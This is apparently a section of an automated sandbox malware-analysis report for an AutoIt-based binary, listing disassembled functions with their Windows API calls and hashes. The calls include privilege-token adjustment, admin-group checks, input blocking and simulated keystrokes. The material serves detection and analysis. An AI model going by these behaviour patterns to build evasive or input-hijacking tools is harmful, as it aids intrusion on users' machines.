Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 1b4bcf59f19a4a550b597216b689de6de8e9148f62cca4a649056a64d68db96e
Instruction ID: 85c0d79e280561a646340f4dc548569e0846378fbe865623ba5a8f80ab608278
Opcode Fuzzy Hash: 1b4bcf59f19a4a550b597216b689de6de8e9148f62cca4a649056a64d68db96e
Instruction Fuzzy Hash: 2B318E35A00518DFDB00DF94D888EADBBB4FF49318F08809AE805AB362DB75E855CB90

Function 008316C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 007EFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 007F0668
Part of subcall function 007EFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 007F0685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0083170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0083173A
GetLastError.KERNEL32 ref: 0083174A

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: b88af71672f694f8845c4399a69ad108879df500b3d8f882ca014cf96cc4ef60
Instruction ID: f3e1919d67c761e357f66c4e7ac03f127fcd5367de9ea48aadaab049b78ae210
Opcode Fuzzy Hash: b88af71672f694f8845c4399a69ad108879df500b3d8f882ca014cf96cc4ef60
Instruction Fuzzy Hash: 9311C1B2504309AFDB18EF54DC8AD6ABBFDFB44B54B24852EE05693641EB70BC418A60

Function 0083D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0083D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0083D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0083D650

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 2c0159cb034bbc56c47f602d54026fdc6550204c470df70eca04ce7347a1cc8c
Instruction ID: b532bf203b324693056bf32bca681d7f2deb90c6d1028b785c47d9fed2178633
Opcode Fuzzy Hash: 2c0159cb034bbc56c47f602d54026fdc6550204c470df70eca04ce7347a1cc8c
Instruction Fuzzy Hash: 17113C75E05228BBDB108F95EC45FAFBBBCFB85B50F108115F914E7290D6B05A058BE1

Function 00831663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0083168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008316A1
FreeSid.ADVAPI32(?), ref: 008316B1

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: d6fbf2ea850c8917f5b846fb9fa9dbfa84125726c14533c64ba40ad12cb9d351
Instruction ID: 5e2feecb5096c8d62124e64203b02c8e12ba0a6330c4cd56f6d8878f0bd86d00
Opcode Fuzzy Hash: d6fbf2ea850c8917f5b846fb9fa9dbfa84125726c14533c64ba40ad12cb9d351
Instruction Fuzzy Hash: 7BF0F471950309FBDF00DFE49D89EAEBBBCFB08604F505565E501E2181E774AA448A51

Function 0080C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0080C36C

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: c0a3648126aed801639aabda1c35c249fe6c52f1f56d9d5d87952ffd40967df0
Instruction ID: 34a135e3ee104fb1028227e51c5e8bfffc2772439397db06995e02b65b8f2146
Opcode Fuzzy Hash: c0a3648126aed801639aabda1c35c249fe6c52f1f56d9d5d87952ffd40967df0
Instruction Fuzzy Hash: 1B412572A00619AFCB609FB9DC89EBB77B8FB84314F1042A9F905D72C0E6709D818B50

Function 008468EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00846918
FindClose.KERNEL32(00000000), ref: 00846961

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3c94ab56d564665a1c0b8c480002deda4b33bc8660c2ff68d7d878f57418ce2e
Instruction ID: 8c31b19385ba77e1fc637f713b216e7bbf34d6535f193fd658c110087a890b5d
Opcode Fuzzy Hash: 3c94ab56d564665a1c0b8c480002deda4b33bc8660c2ff68d7d878f57418ce2e
Instruction Fuzzy Hash: AD1190316142059FC710DF29D488A26BBE5FF85328F15C69AE8698F3A2D774EC05CB91

Function 008437B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00854891,?,?,00000035,?), ref: 008437E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00854891,?,?,00000035,?), ref: 008437F4

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 0aae1e7644c3f27e58c793dbbe07e40be7c1eb91418693a163abf7b25ff95597
Instruction ID: 7a3ceae9f647ec94a2af183adf4beb06da045be0c061744ad967159cdd73bdab
Opcode Fuzzy Hash: 0aae1e7644c3f27e58c793dbbe07e40be7c1eb91418693a163abf7b25ff95597
Instruction Fuzzy Hash: 13F0E5B06052286AEB2017768C4DFEB3AAEFFC4765F000175F609D2381D9A09944C6B0

Function 0083B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0083B25D
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0083B270

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 077eeba6b746a2e09d226266fc345d412216440383514138552811ec80cc3682
Instruction ID: e5f5de33106e2c14c86d65d9d4acd04c0386cd3134d59fd4113a698ff3a652a6
Opcode Fuzzy Hash: 077eeba6b746a2e09d226266fc345d412216440383514138552811ec80cc3682
Instruction Fuzzy Hash: EEF01D7180428DABDB059FA5C806BBE7BB4FF04309F00910AF965A6192C7B986119F94

Function 008310BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008311FC), ref: 008310D4
CloseHandle.KERNEL32(?,?,008311FC), ref: 008310E9

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: d97f3946d57dd353b31dd2964eab32e2a2d210376ea23bdd2792483f8ab0532e
Instruction ID: 3723526dc2457bac53327ef882c8903e9a6669d36a3955773ef12848303a072f
Opcode Fuzzy Hash: d97f3946d57dd353b31dd2964eab32e2a2d210376ea23bdd2792483f8ab0532e
Instruction Fuzzy Hash: 17E04F32008A40EEE7252B12FC09E777BA9FB04310F10882DF4A5804B1DBA26C90DB50

Function 0084EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0084EABD

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 116f14271b18832bace35559691867f0414554a3b5d9f305b3a1f02ac80dfc7b
Instruction ID: 9b2879cdb45a16cd0ca813b629fa0479ee30a809932c4a420e6ea44c022fa384
Opcode Fuzzy Hash: 116f14271b18832bace35559691867f0414554a3b5d9f305b3a1f02ac80dfc7b
Instruction Fuzzy Hash: C0E012312002159FC710DF59D404D9AB7E9FF68760F018416FD45C7351D674A8408B90

Function 007F09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,007F03EE), ref: 007F09DA

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b552addf20330cf8d42d68819f339229e21053600cc1c4a6446b85ee5f1886ea
Instruction ID: c8e7264fe397d75236044329f21401e49a225a62a07a965625f43262a32f7b1b
Opcode Fuzzy Hash: b552addf20330cf8d42d68819f339229e21053600cc1c4a6446b85ee5f1886ea
Instruction Fuzzy Hash:

Function 00852ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00852B30
DeleteObject.GDI32(00000000), ref: 00852B43
DestroyWindow.USER32 ref: 00852B52
GetDesktopWindow.USER32 ref: 00852B6D
GetWindowRect.USER32(00000000), ref: 00852B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00852CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00852CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852CF8
GetClientRect.USER32(00000000,?), ref: 00852D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00852D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852D80
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852D98
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852DA8
GlobalFree.KERNEL32(00000000), ref: 00852DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0086FC38,00000000), ref: 00852DDB
GlobalFree.KERNEL32(00000000), ref: 00852DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00852E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00852E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00852E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0085303F

Strings

static, xrefs: 00852D3A, 00852E91
DISPLAY, xrefs: 00852EA2
, xrefs: 00852FC5
AutoIt v3, xrefs: 00852CF2

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 978bc3edb4a9f9298350cb1e2fdbaaf8aac9a8aecfc32ed43b7e228389254e9f
Instruction ID: ae56c2a66f0be0d359cbe74050d8992accedaaa279fa380d19479e99d6375102
Opcode Fuzzy Hash: 978bc3edb4a9f9298350cb1e2fdbaaf8aac9a8aecfc32ed43b7e228389254e9f
Instruction Fuzzy Hash: 01027871A00209EFDB14DFA4DC89EAE7BB9FB49311F018159F915EB2A1DB74AD04CB60

Function 008670D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0086712F
GetSysColorBrush.USER32(0000000F), ref: 00867160
GetSysColor.USER32(0000000F), ref: 0086716C
SetBkColor.GDI32(?,000000FF), ref: 00867186
SelectObject.GDI32(?,?), ref: 00867195
InflateRect.USER32(?,000000FF,000000FF), ref: 008671C0
GetSysColor.USER32(00000010), ref: 008671C8
CreateSolidBrush.GDI32(00000000), ref: 008671CF
FrameRect.USER32(?,?,00000000), ref: 008671DE
DeleteObject.GDI32(00000000), ref: 008671E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00867230
FillRect.USER32(?,?,?), ref: 00867262
GetWindowLongW.USER32(?,000000F0), ref: 00867284

Part of subcall function 008673E8: GetSysColor.USER32(00000012), ref: 00867421
Part of subcall function 008673E8: SetTextColor.GDI32(?,?), ref: 00867425
Part of subcall function 008673E8: GetSysColorBrush.USER32(0000000F), ref: 0086743B
Part of subcall function 008673E8: GetSysColor.USER32(0000000F), ref: 00867446
Part of subcall function 008673E8: GetSysColor.USER32(00000011), ref: 00867463
Part of subcall function 008673E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00867471
Part of subcall function 008673E8: SelectObject.GDI32(?,00000000), ref: 00867482
Part of subcall function 008673E8: SetBkColor.GDI32(?,00000000), ref: 0086748B
Part of subcall function 008673E8: SelectObject.GDI32(?,?), ref: 00867498
Part of subcall function 008673E8: InflateRect.USER32(?,000000FF,000000FF), ref: 008674B7
Part of subcall function 008673E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008674CE
Part of subcall function 008673E8: GetWindowLongW.USER32(00000000,000000F0), ref: 008674DB

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: f146b5f40ebf6f7a17491807cea20d20f0019d235338407b0a9186a1812b6dc0
Instruction ID: 6ad0e1f72cdd5f1886f730659112e9c6c54fdf6afc3e0089febf4f8e43a507bf
Opcode Fuzzy Hash: f146b5f40ebf6f7a17491807cea20d20f0019d235338407b0a9186a1812b6dc0
Instruction Fuzzy Hash: 2FA1B172008301EFDB019F60DC49E6B7BA9FF49324F111A19FAA2D61E1D7B5E944CB92

Function 007E8D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 007E8E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00826AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00826AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00826F43

Part of subcall function 007E8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007E8BE8,?,00000000,?,?,?,?,007E8BBA,00000000,?), ref: 007E8FC5

SendMessageW.USER32(?,00001053), ref: 00826F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00826F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00826FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00826FB7

Strings

0, xrefs: 00826DCF

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 90dd9e3b137c36f0eac4acb1bb0b492bcc47baa1312d8d7dbee05dfd9bd5138f
Instruction ID: a401b76d3064870bfb01b9ad9598859e5c03767a4dc918ef5cd891eee863cb23
Opcode Fuzzy Hash: 90dd9e3b137c36f0eac4acb1bb0b492bcc47baa1312d8d7dbee05dfd9bd5138f
Instruction Fuzzy Hash: E712DE34201261DFDB25DF24E848BA6BBE1FF49310F584069F489CB661DB35ECA1CB92

Function 00852711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0085273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0085286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 008528A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 008528B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00852900
GetClientRect.USER32(00000000,?), ref: 0085290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00852955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00852964
GetStockObject.GDI32(00000011), ref: 00852974
SelectObject.GDI32(00000000,00000000), ref: 00852978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00852988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00852991
DeleteDC.GDI32(00000000), ref: 0085299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008529C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 008529DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00852A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00852A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00852A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00852A77
GetStockObject.GDI32(00000011), ref: 00852A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00852A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00852A97

Strings

static, xrefs: 0085294F, 00852A71
DISPLAY, xrefs: 0085295A
msctls_progress32, xrefs: 00852A13
AutoIt v3, xrefs: 008528F8

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 366a31ed82b9eb89c506611523469fbc521b3d1202b2573fc7e747e92d0a9efe
Instruction ID: a26443f3b851865ebabd85bd1657551a53ba2912501395053a27ba3441789f49
Opcode Fuzzy Hash: 366a31ed82b9eb89c506611523469fbc521b3d1202b2573fc7e747e92d0a9efe
Instruction Fuzzy Hash: D3B14B71A00219AFEB14DFA8DC49FAE7BB9FB09711F018115F915E7690DBB4AD40CBA0

Function 00844ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00844AED
